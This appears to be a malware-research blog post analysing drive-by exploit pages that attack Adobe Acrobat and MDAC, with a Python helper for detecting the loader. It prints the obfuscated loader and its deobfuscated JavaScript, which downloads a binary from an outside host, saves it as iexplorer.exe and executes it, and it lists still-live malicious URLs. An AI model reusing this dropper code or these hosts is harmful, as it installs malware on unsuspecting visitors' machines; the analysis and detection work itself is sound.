Once again, we have an Adobe exploit page injecting another piece of malware. This one is different from the one posted earlier: it redirects through multiple pages, logging each visitor along the way. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the installed binary is almost entirely undetected apart from a few heuristic catches. See below for more information about this exploit and about the binary. It can be downloaded from /pnuemo-malware/ in our repository.
BE ADVISED: All sites may be active. Proceed at your own risk.
The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php
This page contains a simple hidden iframe that loads multiple pages, each of which logs the visitor.
hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. It contains many pages of code, too much to post here. You can view or download a clean .txt of the exploit page's code by clicking here.
We discovered another exploit page that injects malware onto the user's computer by way of a vulnerability in MDAC. The initial page is loaded with obfuscated code. When deobfuscated, it exploits Adobe and then opens the loader page from which the malware payload is injected. Below is an analysis of the exploit page along with the malware information. The binary has very few real detections; most are just heuristics. The file is available in the repository under /pnuemo-malware/.
BE ADVISED: Websites may still be active; proceed at your own risk.
hxxp://gavai-pegc9.ws/Gpack/index.php
<html><head><meta HTTP-EQUIV="REFRESH" content="3; URL=index.php?404"><script language=
JavaScript>str = "ru`su)(:gtobuhno!ru`su)(!zw`s!{`e!<!enbtldou/bsd`udDmdldou)&nckdbu&(:{`e/rdu
@uushctud)&he&-&{`e&(:{`e/rdu@uushctud)&bm`rrhe&-&bm&*&rh&*#e;CE#*#87B4#*&47,74@2,0&
*#0E1,89#*&2@,11&*#B15#*&GB3&*#8D#*&27&(:usx!zw`s!p!<!{`e/Bsd`udNckdbu)&lr&*#yl#*&m3
&*#/#*&YL&*#MI#*&U&*&UQ&-&&(:w`s!r!<!{`e/Bsd`udNckdbu)#Ridm#*#m/@q#*#qm#*#hb`uh#*#n
o#-&&(:w`s!u!<!{`e/Bsd`udNckdbu)&`e&*&ne&*#c/#*&ru&*#sd#*&`l&-&&(:usx!z!u/uxqd!<!0:
p/nqdo)&F&*#D#*&U&-&iuuq;..f`w`h,qdfb8/vr.Fq`bj.mn`e/qiq&-g`mrd(:p/rdoe)(:!u/nqdo)(:u/Vshu
d)p/sdrqnordCnex(:w`s!o`ld!<!&/..//..hdyqmnsds/dyd&:u/R`wdUnGhmd)o`ld-3(:u/Bmnrd)(:|!b`ub
i)d(!z|usx!z!r/ridmmdydbtud)o`ld(:!|!b`ubi)d(!z||b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { s
tr2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></head></html>
deobfuscates to:
start();
function start() {
  var zad = document.createElement('object');
  zad.setAttribute('id','zad');
  zad.setAttribute('classid','cl'+'si'+"d:BD"+"96C5"+'56-65A3-1'+"1D0-98"+'3A-00'+"C04"+'FC2'+"9E"+'36');
  try {
    var q = zad.CreateObject('ms'+"xm"+'l2'+"."+'XM'+"LH"+'T'+'TP','');
    var s = zad.CreateObject("Shel"+"l.Ap"+"pl"+"icati"+"on",'');
    var t = zad.CreateObject('ad'+'od'+"b."+'st'+"re"+'am','');
    try { t.type = 1;
      q.open('G'+"E"+'T','http://gavai-pegc9.ws/Gpack/load.php',false);
      q.send(); t.open();
      t.Write(q.responseBody);
      var name = './/..//iexplorer.exe';
      t.SaveToFile(name,2);
      t.Close();
    } catch(e) {}
    try { s.shellexecute(name); } catch(e) {}
  } catch(e){}
}
hxxp://gavai-pegc9.ws/Gpack/load.php downloads the malware binary.
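The loader above hides its payload with a single-byte XOR (every character of a string literal XOR 1, rebuilt with String.fromCharCode and passed to eval) and then splits the RDS.Dataspace CLSID and the COM object names across concatenated string fragments. The following analysis helper, added here and not part of the original post or the exploit kit, recovers the XOR key from the decode loop, undoes the encoding, rejoins split literals and reports the MDAC/ADODB dropper indicators; the sample page it runs on is constructed for the example, not the live page.

```python
import re

# Shape of the loader on the page: a literal is XOR-ed byte by byte with a constant
# inside String.fromCharCode(<var>.charCodeAt(i) ^ KEY) and the result is eval'd.
XOR_EVAL_RE = re.compile(
    r"String\.fromCharCode\s*\(\s*(\w+)\.charCodeAt\s*\(\s*\w+\s*\)\s*\^\s*(\d+)\s*\)")
# RDS.Dataspace CLSID as assembled from the split literals in the deobfuscated page
MDAC_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"
SUSPICIOUS = ("createobject", "adodb.stream", "shell.application",
              "msxml2.xmlhttp", "savetofile", "shellexecute")

def xor_decode(text, key):
    return "".join(chr(ord(c) ^ key) for c in text)

def decode_script(script):
    """Return the eval'd payload if the script uses the XOR-constant loader, else None."""
    m = XOR_EVAL_RE.search(script)
    if not m:
        return None
    var, key = m.group(1), int(m.group(2))
    lit = re.search(r'\b%s\s*=\s*"((?:[^"\\]|\\.)*)"' % re.escape(var), script)
    return xor_decode(lit.group(1), key) if lit else None

def join_split_literals(js):
    # 'cl'+'si'+"d:BD" -> 'clsid:BD": drop quote-plus-quote seams so split tokens reassemble
    return re.sub(r"""['"]\s*\+\s*['"]""", "", js)

def indicators(js):
    """Static indicators of the MDAC/ADODB dropper pattern in (deobfuscated) JavaScript."""
    flat = join_split_literals(js).lower()
    hits = [tok for tok in SUSPICIOUS if tok in flat]
    if MDAC_CLSID.lower() in flat:
        hits.append("clsid:" + MDAC_CLSID)
    return hits

def analyze(script):
    decoded = decode_script(script)
    return {"xor_loader": decoded is not None, "decoded": decoded,
            "indicators": indicators(decoded if decoded else script)}

# Constructed sample (not the page's live code): a snippet with split literals, encoded
# with XOR 1 and wrapped in the same decode-and-eval loop the page shows.
PLAIN = ("var o = document.createElement('object');"
         "o.setAttribute('classid', 'cl'+'sid:BD'+'96C556-65A3-11D0-983A-00C04FC29E36');"
         "var t = o.CreateObject('ad'+'od'+'b.st'+'ream', '');")
SAMPLE_PAGE = ('str = "' + xor_decode(PLAIN, 1) + '"; str2 = ""; '
               'for (i = 0; i < str.length; i ++) { str2 = str2 + '
               'String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);')
```

Running analyze(SAMPLE_PAGE) flags the XOR loader and reports the CreateObject call, the ADODB.Stream name and the RDS.Dataspace CLSID even though none of them appear contiguously in the page source, which is why a plain string match on the raw HTML misses this kit.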